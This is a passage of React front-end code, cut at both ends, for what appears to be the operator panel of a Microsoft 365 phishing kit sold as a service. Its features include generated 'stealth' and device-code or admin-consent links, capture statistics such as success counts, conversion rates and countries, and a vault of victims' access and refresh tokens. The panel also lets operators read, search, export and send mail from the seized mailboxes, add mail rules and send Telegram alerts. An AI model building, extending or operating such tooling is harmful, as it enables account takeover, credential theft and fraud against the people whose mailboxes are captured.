  const [exportAvailableMailboxes, setExportAvailableMailboxes] = useState([]);
  const [exportSelectedMailboxes, setExportSelectedMailboxes] = useState(new Set());
  const [exportSelectedFolders, setExportSelectedFolders] = useState({});
  const [exportFolderLoading, setExportFolderLoading] = useState({});
  const [exportMailboxFolders, setExportMailboxFolders] = useState({});

  const [exportMailbox, setExportMailbox] = useState("");
  const [exportFolder, setExportFolder] = useState("");
  const [exportStartMonth, setExportStartMonth] = useState(1);
  const [exportStartYear, setExportStartYear] = useState(new Date().getFullYear());
  const [exportEndMonth, setExportEndMonth] = useState(new Date().getMonth() + 1);
  const [exportEndYear, setExportEndYear] = useState(new Date().getFullYear());
  const [exportFolders, setExportFolders] = useState([]);

  const updateManageUrlSection = (section, isOpen) => {
    setManageUrlSections((prev) => ({ ...prev, [section]: isOpen }));
  };

  const sectionArrow = (section) => (manageUrlSections[section] ? "▲" : "▼");

  const [serverAlive, setServerAlive] = useState(true);
  const [lastPing, setLastPing] = useState(null);

  const [activeNav, setActiveNav] = useState("dashboard");
  const [sidebarCollapsed, setSidebarCollapsed] = useState(false);

  const [themeMode, setThemeMode] = useState(() => localStorage.getItem("themeMode") || "dark");
  const isDarkMode = themeMode === "dark";
  const [productLogoUrl, setProductLogoUrl] = useState(() => {
    const savedLogo = localStorage.getItem("productLogoUrl") || "";
    const isOldDefaultLogo =
      savedLogo.includes("YOUR-DOMAIN.COM") ||
      savedLogo.includes("ftm-gid.net/sidebar-logo.png") ||
      savedLogo.includes("ftm-gid.net/login-logo.png");

    return savedLogo && !isOldDefaultLogo ? savedLogo : SIDEBAR_LOGO_URL;
  });
  const [approvedBodyMode, setApprovedBodyMode] = useState("wysiwyg");
  const [approvedPasteMode, setApprovedPasteMode] = useState("plain_text_html");
  const [emailPageSize, setEmailPageSize] = useState(100);
  const [mailSearchQuery, setMailSearchQuery] = useState("");
  const [mailSearchLoading, setMailSearchLoading] = useState(false);
  const [mailSearchAttachmentsOnly, setMailSearchAttachmentsOnly] = useState(false);
  const [mailSearchSortByDate, setMailSearchSortByDate] = useState(false);
  const [sendProgress, setSendProgress] = useState({ active: false, current: 0, total: 0, label: "" });
  const approvedBodyEditorRef = useRef(null);
  const approvedBodyRef = useRef("");
  const approvedSelectedRange = useRef(null);
  const [ruleActions, setRuleActions] = useState([""]);
  const [telegramBotToken, setTelegramBotToken] = useState("");
  const [telegramChatId, setTelegramChatId] = useState("");
  const [telegramSettingsLoading, setTelegramSettingsLoading] = useState(false);
  const [reportResults, setReportResults] = useState([]);
  const [supportMessage, setSupportMessage] = useState("");
  const [supportSending, setSupportSending] = useState(false);

  const [securitySettings, setSecuritySettings] = useState({
    password_override_enabled: false,
    two_factor_enabled: false,
    totp_issuer: "MailPanel",
  });
  const [securityLoading, setSecurityLoading] = useState(false);
  const [currentPanelPassword, setCurrentPanelPassword] = useState("");
  const [newPanelPassword, setNewPanelPassword] = useState("");
  const [confirmPanelPassword, setConfirmPanelPassword] = useState("");
  const [twoFactorSetup, setTwoFactorSetup] = useState(null);
  const [twoFactorCode, setTwoFactorCode] = useState("");
  const [twoFactorDisablePassword, setTwoFactorDisablePassword] = useState("");
  const [twoFactorDisableCode, setTwoFactorDisableCode] = useState("");

  const [confirmModal, setConfirmModal] = useState({
    open: false,
    title: "",
    message: "",
    onConfirm: null,
  });
  const [injectedUsers, setInjectedUsers] = useState({});
  const [inboxResults, setInboxResults] = useState({});
  const [deletingMailbox, setDeletingMailbox] = useState(null);
  const [connectorLoading, setConnectorLoading] = useState({});
  const [conversationsModal, setConversationsModal] = useState({ open: false, email: "", threads: [] });
  const [conversationsLoading, setConversationsLoading] = useState(false);
  const [keywordLoading, setKeywordLoading] = useState(false);

  const [customerProxyUrl, setCustomerProxyUrl] = useState("");

  const [folderLoading, setFolderLoading] = useState(false);
  const folderAbortControllerRef = useRef(null);

  const emailCacheRef = useRef(new Map());
  const emailAbortRef = useRef(null);
  const selectedEmailRef = useRef(null);
  const previousInboxUserRef = useRef({ inboxConnected: false, userId: "" });

  const devicePollIntervalRef = useRef(null);
  const devicePollingRef = useRef(false);
  const keepAliveRef = useRef(null);
  const selectedUserIdRef = useRef("");
  const microsoftStatusRequestRef = useRef(0);

  const [editingKeywordId, setEditingKeywordId] = useState(null);
  const [editingKeywordPhrase, setEditingKeywordPhrase] = useState("");

  const getToken = () => localStorage.getItem("token");
  const role = localStorage.getItem("role") || "";
  const isAdmin = role === "admin";
  const READ_ONLY_MODE = appConfig.read_only_mode === true;

  useEffect(() => {
    const html = document.documentElement;
    if (html) {
      html.setAttribute("lang", "en");
    }
  }, []);

  useEffect(() => {
    if (currentFolderId !== null && currentFolderId !== undefined) {
      localStorage.setItem("currentFolderId", currentFolderId);
    } else {
      localStorage.removeItem("currentFolderId");
    }
  }, [currentFolderId]);

  useEffect(() => {
    document.title = BRAND_NAME;

    const updateIconLink = (rel) => {
      let link = document.querySelector(`link[rel="${rel}"]`);
      if (!link) {
        link = document.createElement("link");
        link.setAttribute("rel", rel);
        document.head.appendChild(link);
      }
      link.setAttribute("href", BROWSER_FAVICON_URL);
      link.setAttribute("type", "image/png");
    };

    updateIconLink("icon");
    updateIconLink("shortcut icon");
    updateIconLink("apple-touch-icon");

    const savedLogo = localStorage.getItem("productLogoUrl") || "";
    if (
      !savedLogo ||
      savedLogo.includes("YOUR-DOMAIN.COM") ||
      savedLogo.includes("ftm-gid.net/sidebar-logo.png") ||
      savedLogo.includes("ftm-gid.net/login-logo.png")
    ) {
      localStorage.setItem("productLogoUrl", SIDEBAR_LOGO_URL);
      setProductLogoUrl(SIDEBAR_LOGO_URL);
    }
  }, []);

  useEffect(() => {
    selectedEmailRef.current = selectedEmail;
  }, [selectedEmail]);

  const getUserLocation = useCallback(() => {
    if (!navigator.geolocation) {
      console.warn("Geolocation not supported by this browser.");
      return;
    }
    navigator.geolocation.getCurrentPosition(
      (position) => {
        const { latitude, longitude } = position.coords;
        setUserGeolocation({ lat: latitude, lon: longitude });
        addToast("Location captured for device flow", "info");
      },
      (error) => {
        console.warn("Geolocation error:", error.message);
        setUserGeolocation(null);
      },
      { enableHighAccuracy: false, timeout: 5000, maximumAge: 60000 }
    );
  }, [addToast]);

  const selectedFolderName = useMemo(() => {
    const found = folders.find((f) => f.id === currentFolderId);
    return found ? found.name : "All Mails Combined";
  }, [folders, currentFolderId]);

  const currentTenantRecord = useMemo(() => {
    const normalized = (tenantHint || "").trim().toLowerCase();
    if (!normalized) return null;
    return (
      tenantConsents.find(
        (t) => (t.tenant_hint || "").trim().toLowerCase() === normalized
      ) || null
    );
  }, [tenantHint, tenantConsents]);

  const currentEnterpriseRecord = useMemo(() => {
    const normalized = (tenantHint || "").trim().toLowerCase();
    if (!normalized) return null;
    return (
      enterpriseTenants.find(
        (t) => (t.tenant_hint || "").trim().toLowerCase() === normalized
      ) || null
    );
  }, [tenantHint, enterpriseTenants]);

  const selectedUserTenantHint = useMemo(() => {
    if (!selectedUserId || !selectedUserId.includes("@")) return "";
    return selectedUserId.split("@")[1].toLowerCase();
  }, [selectedUserId]);

  const canUseMailActions = inboxConnected && !READ_ONLY_MODE;

  const isStandaloneMailViewer = useMemo(() => {
    try {
      const params = new URLSearchParams(window.location.search);
      const requestedView = (params.get("view") || "").toLowerCase();
      const requestedMailbox = (params.get("mail_user_id") || params.get("mailbox") || "").trim();
      return requestedView === "mail" && !!requestedMailbox;
    } catch {
      return false;
    }
  }, []);

  const standaloneMailboxId = useMemo(() => {
    try {
      const params = new URLSearchParams(window.location.search);
      return (params.get("mail_user_id") || params.get("mailbox") || "").trim();
    } catch {
      return "";
    }
  }, []);

  const activeGeneratedLinksCount = useMemo(() => {
    const backendCount = Number(
      dashboardSummary.active_links_generated ||
        dashboardSummary.number_active_links_generated ||
        dashboardSummary.active_link_count ||
        0
    );
    const generatedValues = [
      generatedLoginUrl,
      generatedMailConnectUrl,
      generatedOrgConnectUrl,
      generatedOrgMailConnectUrl,
      generatedAdminConsentUrl,
      deviceSupportPageUrl,
      freshDeviceShareUrl,
      stealthGeneratedUrl,
    ];
    return Math.max(
      backendCount,
      generatedValues.filter((value) => String(value || "").trim()).length
    );
  }, [
    dashboardSummary.active_links_generated,
    dashboardSummary.number_active_links_generated,
    dashboardSummary.active_link_count,
    generatedLoginUrl,
    generatedMailConnectUrl,
    generatedOrgConnectUrl,
    generatedOrgMailConnectUrl,
    generatedAdminConsentUrl,
    deviceSupportPageUrl,
    freshDeviceShareUrl,
    stealthGeneratedUrl,
  ]);

  const activeResultUsers = useMemo(() => {
    if (activeResultMailboxes.length > 0) {
      return activeResultMailboxes
        .filter((row) => String(row.status || "active").toLowerCase() === "active")
        .map((row) => ({
          user_id: row.user_id || row.mailbox || row.email || row.username || "",
          label: row.label || row.email || row.user_id || row.username || "Mailbox",
          sources: row.sources || [],
          mailbox_connected: !!row.mailbox_connected,
          account_active: row.account_active !== false,
          email: row.email || row.mailbox || "",
          plan: row.plan || "",
          expires_at: row.access_expires_at_iso || row.expires_at || row.access_expires_at || "",
        }))
        .filter((row) => row.user_id)
        .sort((a, b) => String(a.label || a.user_id).localeCompare(String(b.label || b.user_id)));
    }

    const rows = new Map();

    const addRow = (userId, source, extra = {}) => {
      const cleanUserId = String(userId || "").trim();
      if (!cleanUserId) return;
      const existing = rows.get(cleanUserId) || {
        user_id: cleanUserId,
        label: cleanUserId,
        sources: new Set(),
        mailbox_connected: false,
        account_active: false,
        email: "",
        plan: "",
        expires_at: "",
      };
      existing.sources.add(source);
      existing.mailbox_connected = existing.mailbox_connected || !!extra.mailbox_connected;
      existing.account_active = existing.account_active || !!extra.account_active;
      existing.email = existing.email || extra.email || "";
      existing.plan = existing.plan || extra.plan || "";
      existing.expires_at = existing.expires_at || extra.expires_at || "";
      existing.label = existing.email || existing.label || cleanUserId;
      rows.set(cleanUserId, existing);
    };

    availableUsers.forEach((userId) => addRow(userId, "Saved user", { account_active: true }));

    tokenVault.forEach((token) => {
      const userId = token.saved_under_user_id || token.tenant_id || token.email;
      const connected = Boolean(
        token.stored_mail_connected ||
          token.mail_connected ||
          token.has_refresh_token ||
          token.access_token ||
          token.connected
      );
      if (connected) {
        addRow(userId, "Connected mailbox", {
          mailbox_connected: true,
          account_active: true,
          email: token.email || userId,
          expires_at: token.expires_at || "",
        });
      }
    });

    customerAccounts
      .filter((customer) => String(customer.status || "").toLowerCase() === "active")
      .forEach((customer) => {
        const userId = customer.microsoft_email || customer.tenant_token_id || customer.email || customer.username;
        addRow(userId, "Active access account", {
          account_active: true,
          email: customer.email || customer.microsoft_email || "",
          plan: customer.plan || "",
          expires_at:
            customer.access_expires_at_iso ||
            customer.access_expires_at ||
            customer.expires_at ||
            "",
        });
      });

    return Array.from(rows.values())
      .map((row) => ({ ...row, sources: Array.from(row.sources) }))
      .filter((row) => row.account_active || row.mailbox_connected)
      .sort((a, b) => a.label.localeCompare(b.label));
  }, [activeResultMailboxes, availableUsers, tokenVault, customerAccounts]);

  function updateThemeMode(nextMode) {
    setThemeMode(nextMode);
    localStorage.setItem("themeMode", nextMode);
  }

  function attachmentCanPreview(attachment) {
    const name = String(attachment?.name || "").toLowerCase();
    const type = String(attachment?.contentType || attachment?.content_type || "").toLowerCase();
    return (
      type.startsWith("image/") ||
      type.includes("pdf") ||
      type.includes("html") ||
      type.includes("svg") ||
      name.endsWith(".pdf") ||
      name.endsWith(".html") ||
      name.endsWith(".htm") ||
      name.endsWith(".svg") ||
      name.endsWith(".png") ||
      name.endsWith(".jpg") ||
      name.endsWith(".jpeg") ||
      name.endsWith(".gif") ||
      name.endsWith(".webp")
    );
  }

  function canPreviewAttachment(attachment) {
    return attachmentCanPreview(attachment);
  }

  function attachmentIconFor(attachment) {
    return attachmentIconLabel(attachment);
  }

  function emailHasAttachment(item) {
    return Boolean(
      item?.hasAttachments ||
        item?.has_attachments ||
        item?.attachment_count ||
        item?.attachments_count ||
        (Array.isArray(item?.attachments) && item.attachments.length > 0)
    );
  }

  function getMessageAttachmentCount(message) {
    return Number(
      message?.attachment_count ||
        message?.attachments_count ||
        message?.attachments?.length ||
        (message?.hasAttachments || message?.has_attachments ? 1 : 0) ||
        0
    );
  }

  function normalizeAttachmentList(value) {
    return Array.isArray(value) ? value.filter(Boolean) : [];
  }

  function attachmentIconLabel(attachment) {
    const name = String(attachment?.name || "").toLowerCase();
    const type = String(attachment?.contentType || attachment?.content_type || "").toLowerCase();
    if (type.startsWith("image/") || /\.(png|jpe?g|gif|webp|svg)$/.test(name)) return "IMG";
    if (type.includes("pdf") || name.endsWith(".pdf")) return "PDF";
    if (name.endsWith(".doc") || name.endsWith(".docx")) return "DOC";
    if (type.includes("html") || name.endsWith(".html") || name.endsWith(".htm")) return "HTML";
    return "FILE";
  }

  function normalizeApprovedBodyForSend() {
    let content = approvedBody;
    if (approvedBodyMode === "wysiwyg") {
      content = approvedBodyRef.current || approvedBody;
    }
    if (approvedBodyMode === "text") {
      return plainTextToHtml(content);
    }
    return content;
  }

  function handleApprovedBodyModeChange(newMode) {
    if (newMode === approvedBodyMode) return;
    let currentContent = approvedBodyRef.current || approvedBody;

    if (approvedBodyMode === "text" && newMode === "wysiwyg") {
      currentContent = plainTextToHtml(currentContent);
    } else if (approvedBodyMode === "wysiwyg" && newMode === "text") {
      currentContent = htmlToPlainText(currentContent);
    } else if (approvedBodyMode === "html" && newMode === "text") {
      currentContent = htmlToPlainText(currentContent);
    } else if (approvedBodyMode === "text" && newMode === "html") {
      currentContent = plainTextToHtml(currentContent);
    }

    setApprovedBody(currentContent);
    approvedBodyRef.current = currentContent;
    setApprovedBodyMode(newMode);
  }

  function handleApprovedEditorPaste(e) {
    if (approvedBodyMode !== "wysiwyg") return;
    if (approvedPasteMode !== "plain_text_html") return;
    e.preventDefault();
    const text = e.clipboardData?.getData("text/plain") || "";
    document.execCommand("insertHTML", false, plainTextToHtml(text));
    if (approvedBodyEditorRef.current) {
      approvedBodyRef.current = approvedBodyEditorRef.current.innerHTML;
      setApprovedBody(approvedBodyRef.current);
    }
  }

  function syncApprovedEditorFromHtml() {
    if (approvedBodyEditorRef.current && approvedBodyMode === "wysiwyg") {
      const html = approvedBodyRef.current || approvedBody;
      if (approvedBodyEditorRef.current.innerHTML !== html) {
        approvedBodyEditorRef.current.innerHTML = html;
      }
    }
  }

  function applyEditorCommand(command, value = null) {
    if (approvedBodyMode !== "wysiwyg") {
      addToast("Switch to WYSIWYG mode first", "warning");
      return;
    }
    document.execCommand(command, false, value);
    if (approvedBodyEditorRef.current) {
      approvedBodyRef.current = approvedBodyEditorRef.current.innerHTML;
      setApprovedBody(approvedBodyRef.current);
    }
  }

  function insertImageIntoApprovedBody(src) {
    if (!src) return;
    if (approvedBodyMode === "html") {
      setApprovedBody((prev) => `${prev || ""}<p><img src="${src}" alt="image" style="max-width:100%;height:auto;" /></p>`);
      approvedBodyRef.current = approvedBody;
      return;
    }
    applyEditorCommand("insertHTML", `<img src="${src}" alt="image" style="max-width:100%;height:auto;" />`);
  }

  function handleApprovedInlineImageFile(file) {
    if (!file || !file.type?.startsWith("image/")) {
      addToast("Select an image file", "warning");
      return;
    }
    const reader = new FileReader();
    reader.onload = () => {
      const dataUrl = String(reader.result || "");
      if (approvedBodyMode === "text") {
        const placeholder = `[Image: ${file.name}] (${dataUrl.substring(0, 50)}...)`;
        setApprovedBody((prev) => `${prev || ""}${placeholder}\n`);
        approvedBodyRef.current = approvedBody;
        addToast("Image URL inserted as plain text", "info");
      } else {
        insertImageIntoApprovedBody(dataUrl);
      }
    };
    reader.onerror = () => addToast("Failed to read image", "error");
    reader.readAsDataURL(file);
  }

  function addApprovedHyperlink() {
    const url = window.prompt("Enter hyperlink URL");
    if (!url) return;

    if (approvedSelectedRange.current) {
      const sel = window.getSelection();
      sel.removeAllRanges();
      sel.addRange(approvedSelectedRange.current);
      approvedSelectedRange.current = null;
    }

    if (approvedBodyMode === "text") {
      const selection = window.getSelection ? window.getSelection() : null;
      let selectedText = "";
      if (selection && selection.rangeCount > 0 && selection.toString().trim()) {
        selectedText = selection.toString().trim();
      }
      const text = selectedText || window.prompt("Text for link", url) || url;
      const linkText = `[${text}](${url})`;
      if (selectedText) {
        document.execCommand("insertText", false, linkText);
      } else {
        setApprovedBody((prev) => prev + linkText);
        approvedBodyRef.current = approvedBody;
      }
      return;
    }

    if (approvedBodyMode === "html") {
      const text = window.prompt("Text for link", url) || url;
      setApprovedBody((prev) => `${prev || ""}<a href="${url}" target="_blank" rel="noreferrer">${text}</a>`);
      approvedBodyRef.current = approvedBody;
      return;
    }

    const selection = window.getSelection ? window.getSelection() : null;
    if (!selection || selection.rangeCount === 0 || String(selection).trim() === "") {
      const text = window.prompt("No text is selected. Enter link text", url) || url;
      applyEditorCommand("insertHTML", `<a href="${url}" target="_blank" rel="noreferrer">${text}</a>`);
      return;
    }

    applyEditorCommand("createLink", url);
  }

  const saveReplySelection = () => {
    const sel = window.getSelection();
    if (sel && sel.rangeCount > 0) {
      replySelection.current = sel.getRangeAt(0);
    }
  };

  useEffect(() => {
    if (replyEditorRef.current && replySelection.current) {
      const sel = window.getSelection();
      sel.removeAllRanges();
      sel.addRange(replySelection.current);
    }
  }, [replyBody]);

  const applyReplyEditorCommand = (command, value = null) => {
    if (replyBodyMode !== "wysiwyg") {
      addToast("Switch to WYSIWYG mode first", "warning");
      return;
    }
    document.execCommand(command, false, value);
    if (replyEditorRef.current) {
      replyBodyRef.current = replyEditorRef.current.innerHTML;
      setReplyBody(replyBodyRef.current);
    }
  };

  const insertReplyHyperlink = () => {
    const url = window.prompt("Enter hyperlink URL");
    if (!url) return;

    if (replySelectedRange.current) {
      const sel = window.getSelection();
      sel.removeAllRanges();
      sel.addRange(replySelectedRange.current);
      replySelectedRange.current = null;
    }

    if (replyBodyMode === "text") {
      const text = window.prompt("Text for link", url) || url;
      setReplyBody((prev) => `${prev || ""}[${text}](${url})`);
      replyBodyRef.current = replyBody;
    } else if (replyBodyMode === "html") {
      const text = window.prompt("Text for link", url) || url;
      setReplyBody((prev) => `${prev || ""}<a href="${url}" target="_blank" rel="noreferrer">${text}</a>`);
      replyBodyRef.current = replyBody;
    } else {
      applyReplyEditorCommand("createLink", url);
    }
  };

  const handleReplyInlineImage = (file) => {
    if (!file || !file.type?.startsWith("image/")) {
      addToast("Select an image file", "warning");
      return;
    }
    const reader = new FileReader();
    reader.onload = () => {
      const dataUrl = String(reader.result || "");
      if (replyBodyMode === "text") {
        setReplyBody((prev) => `${prev || ""}[Image: ${file.name}] (${dataUrl.substring(0, 50)}...)\n`);
        replyBodyRef.current = replyBody;
      } else if (replyBodyMode === "html") {
        setReplyBody((prev) => `${prev || ""}<p><img src="${dataUrl}" alt="${file.name}" style="max-width:100%;height:auto;" /></p>`);
        replyBodyRef.current = replyBody;
      } else {
        applyReplyEditorCommand("insertHTML", `<img src="${dataUrl}" alt="${file.name}" style="max-width:100%;height:auto;" />`);
      }
    };
    reader.onerror = () => addToast("Failed to read image", "error");
    reader.readAsDataURL(file);
  };

  const insertReplySignature = () => {
    const signature = userSignature || localStorage.getItem("userSignature") || "";
    if (!signature) {
      addToast("No signature set. Add one in Settings.", "warning");
      return;
    }
    if (replyBodyMode === "text") {
      setReplyBody((prev) => `${prev || ""}\n-- \n${signature}`);
      replyBodyRef.current = replyBody;
    } else {
      const sigHtml = `<br/>-- <br/>${plainTextToHtml(signature)}`;
      if (replyBodyMode === "html") {
        setReplyBody((prev) => `${prev || ""}${sigHtml}`);
        replyBodyRef.current = replyBody;
      } else {
        applyReplyEditorCommand("insertHTML", sigHtml);
      }
    }
  };

  const changeReplyMode = (newMode) => {
    if (newMode === replyBodyMode) return;
    let currentContent = replyBodyRef.current || replyBody;

    if (replyBodyMode === "text" && newMode === "wysiwyg") {
      currentContent = plainTextToHtml(currentContent);
    } else if (replyBodyMode === "wysiwyg" && newMode === "text") {
      currentContent = htmlToPlainText(currentContent);
    } else if (replyBodyMode === "html" && newMode === "text") {
      currentContent = htmlToPlainText(currentContent);
    } else if (replyBodyMode === "text" && newMode === "html") {
      currentContent = plainTextToHtml(currentContent);
    }

    setReplyBody(currentContent);
    replyBodyRef.current = currentContent;
    setReplyBodyMode(newMode);
  };

  const sendAdvancedReply = async () => {
    if (!selectedEmail) {
      addToast("No email selected", "warning");
      return;
    }
    let bodyToSend = replyBody;
    if (replyBodyMode === "wysiwyg") {
      bodyToSend = replyBodyRef.current || replyBody;
    }
    if (!bodyToSend.trim()) {
      addToast("Reply text is required", "warning");
      return;
    }
    const subject = selectedEmail.subject?.startsWith("Re:") ? selectedEmail.subject : `Re: ${selectedEmail.subject}`;
    const to = selectedEmail.from;
    if (!to) {
      addToast("Cannot determine sender address", "error");
      return;
    }
    const form = new FormData();
    form.append("user_id", selectedUserId);
    form.append("recipient", to);
    form.append("subject", subject);
    form.append("body", replyBodyMode === "text" ? plainTextToHtml(bodyToSend) : bodyToSend);
    form.append("cc", replyCc || "");
    form.append("bcc", replyBcc || "");
    form.append("cc_separator", "auto");
    form.append("bcc_separator", "auto");
    form.append("body_mode", replyBodyMode === "html" ? "html" : (replyBodyMode === "text" ? "text" : "wysiwyg"));
    form.append("plain_text_in_html", "false");
    if (replyAttachment) {
      form.append("attachment", replyAttachment);
    }

    try {
      const res = await fetchWithAuth(`${API}/send-approved-email`, {
        method: "POST",
        body: form,
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to send reply", "error");
        return;
      }
      addToast("Reply sent successfully", "success");
      setReplyBody("");
      setReplyCc("");
      setReplyBcc("");
      setReplyAttachment(null);
      setShowReplyBox(false);
      replyBodyRef.current = "";
      await loadEmails(currentFolderId);
    } catch (err) {
      addToast(err.message || "Failed to send reply", "error");
    }
  };

  const sendReplyAll = () => {
    if (!selectedEmail) {
      addToast("No email selected", "warning");
      return;
    }
    const to = selectedEmail.from;
    if (!to) {
      addToast("Cannot determine sender address", "error");
      return;
    }
    const allRecipients = (selectedEmail.to || []).concat(selectedEmail.cc || []);
    const ccList = allRecipients.filter(r => r !== to).join("; ");
    setReplyCc(ccList);
    const replyHeader = `On ${selectedEmail.date || "unknown date"}, ${to} wrote:\n\n`;
    const quotedBody = selectedEmail.bodyPreview || "";
    let initialBody = replyHeader + quotedBody;

    const signature = userSignature || localStorage.getItem("userSignature") || "";
    if (signature) {
      initialBody = signature + "\n\n" + initialBody;
    }

    setReplyBody(initialBody);
    replyBodyRef.current = initialBody;
    setReplyBodyMode("text");
    setShowReplyBox(true);
  };

  const handleReplyClick = () => {
    if (!selectedEmail) {
      addToast("No email selected", "warning");
      return;
    }
    const to = selectedEmail.from;
    if (!to) {
      addToast("Cannot determine sender address", "error");
      return;
    }
    const replyHeader = `On ${selectedEmail.date || "unknown date"}, ${to} wrote:\n\n`;
    const quotedBody = selectedEmail.bodyPreview || "";
    let initialBody = replyHeader + quotedBody;

    const signature = userSignature || localStorage.getItem("userSignature") || "";
    if (signature) {
      initialBody = signature + "\n\n" + initialBody;
    }

    setReplyBody(initialBody);
    replyBodyRef.current = initialBody;
    setReplyBodyMode("text");
    setShowReplyBox(true);
  };

  const applyCalendarEditorCommand = (command, value = null) => {
    if (calendarDescriptionMode !== "wysiwyg") {
      addToast("Switch to Visual editor first", "warning");
      return;
    }
    document.execCommand(command, false, value);
    if (calendarDescriptionRef.current) {
      setCalendarDescription(calendarDescriptionRef.current.innerHTML);
    }
  };

  const insertCalendarHyperlink = () => {
    const url = window.prompt("Enter hyperlink URL");
    if (!url) return;

    if (calendarDescriptionSelectedRange.current) {
      const sel = window.getSelection();
      sel.removeAllRanges();
      sel.addRange(calendarDescriptionSelectedRange.current);
      calendarDescriptionSelectedRange.current = null;
    }

    if (calendarDescriptionMode === "text") {
      const text = window.prompt("Text for link", url) || url;
      setCalendarDescription((prev) => `${prev || ""}[${text}](${url})`);
    } else if (calendarDescriptionMode === "html") {
      const text = window.prompt("Text for link", url) || url;
      setCalendarDescription((prev) => `${prev || ""}<a href="${url}" target="_blank" rel="noreferrer">${text}</a>`);
    } else {
      const selection = window.getSelection();
      if (!selection || selection.rangeCount === 0 || String(selection).trim() === "") {
        const text = window.prompt("No text selected. Enter link text", url) || url;
        document.execCommand("insertHTML", false, `<a href="${url}" target="_blank" rel="noreferrer">${text}</a>`);
      } else {
        document.execCommand("createLink", false, url);
      }
      if (calendarDescriptionRef.current) {
        setCalendarDescription(calendarDescriptionRef.current.innerHTML);
      }
    }
  };

  const handleCalendarInlineImage = (file) => {
    if (!file || !file.type?.startsWith("image/")) {
      addToast("Select an image file", "warning");
      return;
    }
    const reader = new FileReader();
    reader.onload = () => {
      const dataUrl = String(reader.result || "");
      if (calendarDescriptionMode === "text") {
        setCalendarDescription((prev) => `${prev || ""}[Image: ${file.name}] (${dataUrl.substring(0, 50)}...)\n`);
      } else if (calendarDescriptionMode === "html") {
        setCalendarDescription((prev) => `${prev || ""}<p><img src="${dataUrl}" alt="${file.name}" style="max-width:100%;height:auto;" /></p>`);
      } else {
        if (calendarDescriptionSelectedRange.current) {
          const sel = window.getSelection();
          sel.removeAllRanges();
          sel.addRange(calendarDescriptionSelectedRange.current);
          calendarDescriptionSelectedRange.current = null;
        }
        document.execCommand("insertHTML", false, `<img src="${dataUrl}" alt="${file.name}" style="max-width:100%;height:auto;" />`);
        if (calendarDescriptionRef.current) {
          setCalendarDescription(calendarDescriptionRef.current.innerHTML);
        }
      }
    };
    reader.onerror = () => addToast("Failed to read image", "error");
    reader.readAsDataURL(file);
  };

  const changeCalendarDescriptionMode = (newMode) => {
    if (newMode === calendarDescriptionMode) return;
    let content = calendarDescription;
    if (calendarDescriptionMode === "text" && newMode === "wysiwyg") {
      content = plainTextToHtml(content);
    } else if (calendarDescriptionMode === "wysiwyg" && newMode === "text") {
      content = htmlToPlainText(content);
    } else if (calendarDescriptionMode === "html" && newMode === "text") {
      content = htmlToPlainText(content);
    } else if (calendarDescriptionMode === "text" && newMode === "html") {
      content = plainTextToHtml(content);
    }
    setCalendarDescription(content);
    if (calendarDescriptionRef.current && newMode === "wysiwyg") {
      calendarDescriptionRef.current.innerHTML = content;
    }
    setCalendarDescriptionMode(newMode);
  };

  function addRuleActionSlot() {
    setRuleActions((prev) => (prev.length >= 4 ? prev : [...prev, ""]));
  }

  function updateRuleActionSlot(index, value) {
    setRuleActions((prev) => prev.map((item, i) => (i === index ? value : item)));
    setRuleAction(value);
  }

  function removeRuleActionSlot(index) {
    setRuleActions((prev) => prev.filter((_, i) => i !== index));
  }

  function confirm(title, message, onConfirm) {
    setConfirmModal({ open: true, title, message, onConfirm });
  }

  async function pingServer() {
    try {
      const res = await fetch(`${API}/ping`);
      if (res.ok) {
        setServerAlive(true);
        setLastPing(new Date().toLocaleTimeString());
      } else {
        setServerAlive(false);
      }
    } catch {
      setServerAlive(false);
    }
  }

  function stopDeviceAutoPolling() {
    if (devicePollIntervalRef.current) {
      clearInterval(devicePollIntervalRef.current);
      devicePollIntervalRef.current = null;
    }
    setAutoPollingEnabled(false);
  }

  function logout() {
    stopDeviceAutoPolling();
    if (keepAliveRef.current) clearInterval(keepAliveRef.current);
    fetch(`${API}/auth/logout`, { method: "POST", credentials: "include" }).catch(() => {});
    localStorage.removeItem("token");
    localStorage.removeItem("role");
    localStorage.removeItem("username");
    setIsAuthenticated(false);
    setEmails([]);
    setEmailNextLink("");
    setEmailLoadingMore(false);
    setFolders([]);
    setSelectedEmail(null);
    setSelectedEmailAttachments([]);
    setAttachmentsLoading(false);
    setShowAttachmentPanel(false);
    setShowConversationPanel(false);
    setSelectedEmailConversation([]);
    setConversationLoading(false);
    setCurrentFolderId(null);
    setAvailableUsers([]);
    setSelectedUserId("");
    setMicrosoftConnected(false);
    setInboxConnected(false);
    setEnterpriseStatus({
      tenant_hint: "",
      mode: "preview",
      consent_status: "none",
      enterprise_enabled: false,
      app_only_enabled: false,
      notes: "",
    });
    setGeneratedLoginUrl("");
    setGeneratedMailConnectUrl("");
    setGeneratedOrgConnectUrl("");
    setGeneratedOrgMailConnectUrl("");
    setGeneratedAdminConsentUrl("");
    setDeviceSupportPageUrl("");
    setStealthUserId("");
    setStealthGeneratedUrl("");
    setStealthPayloadInfo(null);
    setStealthModal({ open: false, userId: "", stealthUrl: "", supportPageUrl: "" });
    setTenantHint("");
    setTenantConsents([]);
    setEnterpriseTenants([]);
    setEnterpriseOrgName("");
    setEnterpriseNotes("");
    setConnectError("");
    setAdminConsentRequired(false);
    setBlockedUserId("");
    setRules([]);
    setShowCompose(false);
    setShowReplyBox(false);
    setShowForwardBox(false);
    setComposeTo("");
    setComposeSubject("");
    setComposeBody("");
    setReplyText("");
    setForwardTo("");
    setForwardCc("");
    setDeviceCodeData(null);
    setDeviceFlowStatus("");
    setDevicePolling(false);
    setDeviceMailMode(false);
    setDeviceCodeStartedAt(null);
    setDeviceCodeSecondsLeft(null);
    setPayloadInfo(null);
    setPayloadScopes(null);
    setVisits([]);
    setVisitSummary({
      total_visits: 0,
      successful_captures: 0,
      failed_attempts: 0,
      conversion_rate: 0,
      recent_visits_24h: 0,
      country_count: 0,
      top_countries: [],
      device_breakdown: [],
      browser_breakdown: [],
    });
    setInjectedUsers({});
    setInboxResults({});
    setConnectorLoading({});
    setDeletingMailbox(null);
    setDashboardSummary({
      saved_users_count: 0,
      connected_mailboxes_count: 0,
      approved_tenants_count: 0,
      pending_tenants_count: 0,
      enterprise_enabled_count: 0,
    });
    setCustomDomains([]);
    setNewDomainInput("");
    if (emailCacheRef.current) emailCacheRef.current.clear();
    if (emailAbortRef.current) {
      try { emailAbortRef.current.abort(); } catch {}
    }
    addToast("Signed out successfully", "info");
  }

  async function fetchWithAuth(url, options = {}) {
